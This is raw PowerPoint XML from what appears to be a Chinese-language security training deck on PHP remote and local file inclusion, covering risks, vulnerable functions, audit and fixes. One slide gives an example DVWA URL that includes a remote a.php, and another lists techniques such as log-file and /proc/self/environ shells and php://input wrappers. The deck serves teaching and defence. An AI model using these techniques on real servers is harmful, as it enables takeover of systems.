              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>readfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6888392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远程文件包含漏洞风险</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击者可利用代码注入漏洞执行任意代码，来操作服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击者可利用代码注入漏洞操作数据库，插入恶意数据，可能获取系统权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击者可利用代码注入攻击修改系统配置，修改网络配置，可能对服务器及网络造成影响</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>代码注入攻击后可以进一步对网络渗透，由于代码注入攻击多半可获取系统权限，对网络的进一步渗透难度大大降低</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48745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如何利用远程文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://mydvwa.com/dvwa/vulnerabilities/fi</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>page=file1.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>上面链接中，我们可以传递一个文件名，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会根据文件名进行导入操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我们可以指定我们自己编写的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:http://site1.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>a.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这里会输出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内容。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://mydvwa.com/dvwa/vulnerabilities/fi</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/?page=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>site1.com/a.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>a.php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中写入木马，可以控制对方机器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7419181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远程文件包含漏洞代码审计方法</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看是否有如下代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>include(), </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>include_once</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>require(), </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>readfile</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19125491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如何修复远程文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不需要执行远程代码时，可以修改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= Off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不要直接导入用户输入的内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>执行代码的参数，或文件名，禁止和用户输入相关，只能由开发人员定义代码内容，用户只能提交“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，代表相应代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16792467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本地文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过本知识域，我们会：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是本地文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解本地文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包含漏洞所用到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握本地文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包含漏洞的利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语言中的封装协议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握本地文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的修复方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2169559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本地文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>与远程文件包含漏洞类似，可以读取任意的本地文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以通过远程文件包含漏洞来生成本地文件包含漏洞的代码来利用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件包含漏洞可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包含本地文件，在条件允许时甚至能执行代码 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传图片马，然后包含 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>读</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>敏感文件，读</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>日志文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GetShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>envion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GetShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>data:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等伪协议 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>则可以包含临时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11184057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本地文件包含漏洞所用到的函数</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>与远程文件包含漏洞所用到的函数相同：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>include(), </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>include_once</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>require(), </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>readfile</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1226651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本地文件包含漏洞利用方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
